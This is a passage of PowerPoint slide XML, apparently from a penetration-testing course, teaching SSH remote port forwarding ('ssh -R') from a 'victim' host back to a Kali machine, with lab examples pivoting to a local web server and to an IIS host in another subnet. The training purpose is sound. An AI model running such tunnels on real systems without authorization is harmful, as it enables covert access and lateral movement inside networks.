          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40758104-89AB-4CEC-8C52-0045D8D5DFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="3590925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick Aside: If you’re forwarding to Kali, enable SSH first (disabled by default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run on the host you want to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>grant access to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (often the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>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–R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remoteport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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targ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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targe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user@kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse the pipe from local port forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle: Rounded Corners 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F1A76E-0727-41DD-995D-043A220EA644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4400550" y="5336382"/>
            <a:ext cx="2924175" cy="323850"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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SSH Tunnel </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="sng" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>FROM</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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C6F73B-85BD-4E39-9686-988BFAC29DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="7515224" y="5188744"/>
            <a:ext cx="966789" cy="619125"/>
            <a:chOff x="8362949" y="5148261"/>
            <a:chExt cx="966789" cy="619125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041965F3-0907-47EB-A592-7F17428FD513}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9053513" y="5148261"/>
              <a:ext cx="276225" cy="6191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5" name="Arrow: Right 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08FD61F0-874F-48A1-9276-254A56544068}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8362949" y="5295900"/>
              <a:ext cx="571501" cy="32385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9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E809445-2531-4766-8756-FCC7B48EAFAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="3251447" y="5188742"/>
            <a:ext cx="962026" cy="619125"/>
            <a:chOff x="2862262" y="5176837"/>
            <a:chExt cx="962026" cy="619125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC061606-FD8C-44DF-9A80-6F223CF21AB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3548063" y="5176837"/>
              <a:ext cx="276225" cy="619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Arrow: Right 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D71B3A-50A9-4C4F-83D1-34AE9692C6D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862262" y="5324475"/>
              <a:ext cx="547688" cy="3238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20EC3B83-60B1-47C8-A922-EE063D46DFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814637" y="5845850"/>
            <a:ext cx="1142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Kali Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BCC05DF-E60E-46EA-B118-70A28E2413ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6971003" y="5807870"/>
            <a:ext cx="14001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Target Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{956E5C8C-096F-4B4D-9325-AB39C2C1CF9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8856168" y="5186123"/>
            <a:ext cx="1897554" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00B05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SSH Command run here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24813090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DE4E3-EBB3-4F85-A09F-C35EF2AF96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E9A5E24-3759-4D1E-A2CD-5B2E63BF6F6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example – Local Port Open</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D1FB03-98D5-409D-8C72-D8B700E50305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1152026"/>
            <a:ext cx="11338560" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client01 has a web server listening locally, SSH allowed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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-R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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kali@172.16.100.129</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8588914F-2AB8-4D00-BB0F-36E705A5D381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3887943" y="1989706"/>
            <a:ext cx="6650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Kali port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2D9E5B-5C3F-4D85-ACDD-BE21BCB06BE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4500529" y="1926659"/>
            <a:ext cx="172402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Where to forward traffic to/from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA73077A-9433-4AA0-87E9-E06E0540E49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6224554" y="1976689"/>
            <a:ext cx="6650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Vic port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CCD0FF7-FE73-4996-9241-C7FC20774E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7199253" y="2029694"/>
            <a:ext cx="27693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Remote host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D93EEA-2183-48A8-AEC6-18877558C75E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6557057" y="3214832"/>
            <a:ext cx="5543550" cy="2485869"/>
            <a:chOff x="104775" y="2909091"/>
            <a:chExt cx="5543550" cy="2485869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3AC02A-3E72-4906-A511-A82204C405A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="104775" y="2909091"/>
              <a:ext cx="5543550" cy="24858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22" name="Picture 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F26028F-2514-4F05-AE2F-B1C7D2660B1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="702647" y="3996543"/>
              <a:ext cx="4349061" cy="1251251"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE98E591-30C8-4908-BEF7-8D6251C68B0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="296594" y="3170643"/>
              <a:ext cx="5159912" cy="636364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00BF44E2-2AFF-41B2-BD85-DA8AB287491B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="129828" y="3621683"/>
            <a:ext cx="6267450" cy="1739689"/>
            <a:chOff x="5829300" y="3848311"/>
            <a:chExt cx="6267450" cy="1739689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9CECED-DAEE-4410-92A5-020325A1F5E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5829300" y="3848311"/>
              <a:ext cx="6267450" cy="1739689"/>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25" name="Picture 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF41AE37-A7ED-496D-B9D2-FD4FF8746D80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5910262" y="4503842"/>
              <a:ext cx="6105525" cy="428625"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C8DAEFB-0358-4054-AA42-3C2C536D0374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705548" y="3861493"/>
            <a:ext cx="5203239" cy="29362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3862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DE4E3-EBB3-4F85-A09F-C35EF2AF96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E9A5E24-3759-4D1E-A2CD-5B2E63BF6F6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example – Distant Host in Subnet </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D1FB03-98D5-409D-8C72-D8B700E50305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1152026"/>
            <a:ext cx="11338560" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web01 in the 192 subnet has IIS running, jump box dual-homed in 172 and 192</a:t>
            </a:r>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-R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.100.160</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"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kali@172.16.100.129</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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8588914F-2AB8-4D00-BB0F-36E705A5D381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3335688" y="2029692"/>
            <a:ext cx="6650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Kali port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2D9E5B-5C3F-4D85-ACDD-BE21BCB06BE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4270892" y="1956539"/>
            <a:ext cx="22199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40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Where to forward traffic to/from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA73077A-9433-4AA0-87E9-E06E0540E49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
